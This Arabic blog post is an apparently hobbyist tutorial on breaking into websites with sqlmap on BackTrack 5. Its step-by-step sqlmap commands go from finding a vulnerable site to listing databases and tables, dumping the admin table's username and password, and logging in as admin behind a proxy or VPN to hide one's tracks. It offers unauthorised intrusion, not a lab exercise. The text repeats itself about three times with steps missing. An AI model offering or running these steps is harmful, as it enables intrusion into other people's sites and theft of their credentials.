كيف يقوم الهاكر بختراق المواقع بستعمال sqlmap

شرح أداة رائعة موجودة بالباك تراك 5 وهى أداة sqlmap.py SQL التي تساعدك على الإختراق بسهولة. اتبع الخطوات البسيطة الإختراق الموقع باستخدام backtrak 5

1. نفتح اباكتراك ونكتب cd /pentest/database/sqlmap وبهذا بإن أداة sqlmap مفتوحة !

2. الآن العثور على موقع مصاب.

3. الآن اكتب هذا الأمر واضغط على enter.

python sqlmap.py -u http://xxxxxxxxxx/index.php?id=4 –dbs

http://xxxxxxxxxx/index.php?id=4 هو رابط الموقع المصاب

4. الآن سوف تحصل على اسم قاعدة البيانات للموقع !

حسنا أنا حصلت على اثنين من قاعدة بيانات AJ وinformation_schema سوف نقوم بتحديد قاعدة بيانات.

5. الآن الحصول على جداول قاعدة البيانات. لذلك تحتاج إلى إدخال هذا الأمر وإضغط enter.
python sqlmap.py -u http://xxxxxxxxxx/index.php?id=4 -D (database name) –tables

6. الآن نحن بحاجة للاستيلاء على الجداول من قاعدة البيانات AJ. لصق هذا الأمر أدناه وإضغط enter.

python sqlmap.py -u http://xxxxxxxxxx/index.php?id=4 -D aj –tables

7. الآن سوف تحصل على قائمة الجداول التي يتم تخزينها في قاعدة البيانات AJ

8. الآن أصبح بإمكانك الاستيلاء على أعمدة من الجدول الإدارة

python sqlmap.py -u http://xxxxxxxxxx/index.php?id=4 -T admin --columns

الآن حصلنا على الأعمدة وحصلنا على اسم المستخدم وكلمة المرور9. الآن يتيح الاستيلاء على كلمات السر من admin

python sqlmap.py -u http://xxxxxxxxxx/index.php?id=4 -T admin -U test --dump

الآن حصلنا على اسم المستخدم وكلمة المرور للموقع!

الآن بمجرد العثور على معلومات الإدارة للموقع واستخدام بروكسي/ VPN وسيثم الدخول في الموقع باعتبارك admin.

بقلم samir soltani

من الجزائر20 سنة و هوايتى التقنية والهكر الاخلاقي وأحب أن أدون ,كل ما تعلمته ستجده فى هذه المدونة لإفادة الأشخاص و أتمنى أن تعجبكم مدونتي المتواضعة الفيسبوك . تويتر/

كيف يقوم الهاكر بختراق المواقع بستعمال sqlmap

شرح أداة رائعة موجودة بالباك تراك 5 وهى أداة sqlmap.py SQL التي تساعدك على الإختراق بسهولة. اتبع الخطوات البسيطة الإختراق الموقع باستخدام backtrak 5

1. نفتح اباكتراك ونكتب cd /pentest/database/sqlmap وبهذا بإن أداة sqlmap مفتوحة !

2. الآن العثور على موقع مصاب.

3. الآن اكتب هذا الأمر واضغط على enter.

4. الآن سوف تحصل على اسم قاعدة البيانات للموقع !

6. الآن نحن بحاجة للاستيلاء على الجداول من قاعدة البيانات AJ. لصق هذا الأمر أدناه وإضغط enter.

python sqlmap.py -u http://xxxxxxxxxx/index.php?id=4 -D aj –tables

7. الآن سوف تحصل على قائمة الجداول التي يتم تخزينها في قاعدة البيانات AJ

8. الآن أصبح بإمكانك الاستيلاء على أعمدة من الجدول الإدارة

python sqlmap.py -u http://xxxxxxxxxx/index.php?id=4 -T admin --columns

الآن حصلنا على الأعمدة وحصلنا على اسم المستخدم وكلمة المرور9. الآن يتيح الاستيلاء على كلمات السر من admin

python sqlmap.py -u http://xxxxxxxxxx/index.php?id=4 -T admin -U test --dump

الآن حصلنا على اسم المستخدم وكلمة المرور للموقع!

الآن بمجرد العثور على معلومات الإدارة للموقع واستخدام بروكسي/ VPN وسيثم الدخول في الموقع باعتبارك admin.

بقلم samir soltani

0 commentaires:

إرسال تعليق

أدخل إيميلك لـ التوصل بجديد مواضيع المدونة :

كيف يقوم الهاكر بختراق المواقع بستعمال sqlmap

شرح أداة رائعة موجودة بالباك تراك 5 وهى أداة sqlmap.py SQL التي تساعدك على الإختراق بسهولة. اتبع الخطوات البسيطة الإختراق الموقع باستخدام backtrak 5

1. نفتح اباكتراك ونكتب cd /pentest/database/sqlmap وبهذا بإن أداة sqlmap مفتوحة !

2. الآن العثور على موقع مصاب.

3. الآن اكتب هذا الأمر واضغط على enter.

4. الآن سوف تحصل على اسم قاعدة البيانات للموقع !

6. الآن نحن بحاجة للاستيلاء على الجداول من قاعدة البيانات AJ. لصق هذا الأمر أدناه وإضغط enter.

python sqlmap.py -u http://xxxxxxxxxx/index.php?id=4 -D aj –tables

7. الآن سوف تحصل على قائمة الجداول التي يتم تخزينها في قاعدة البيانات AJ

8. الآن أصبح بإمكانك الاستيلاء على أعمدة من الجدول الإدارة

python sqlmap.py -u http://xxxxxxxxxx/index.php?id=4 -T admin --columns

الآن حصلنا على الأعمدة وحصلنا على اسم المستخدم وكلمة المرور9. الآن يتيح الاستيلاء على كلمات السر من admin

python sqlmap.py -u http://xxxxxxxxxx/index.php?id=4 -T admin -U test --dump

الآن حصلنا على اسم المستخدم وكلمة المرور للموقع!

الآن بمجرد العثور على معلومات الإدارة للموقع واستخدام بروكسي/ VPN وسيثم الدخول في الموقع باعتبارك admin.

مواضيع ذات صله backtrak

بقلم samir soltani

0 commentaires:

إرسال تعليق

أدخل إيميلك لـ التوصل بجديد مواضيع المدونة :

مواضيع ذات صله
backtrak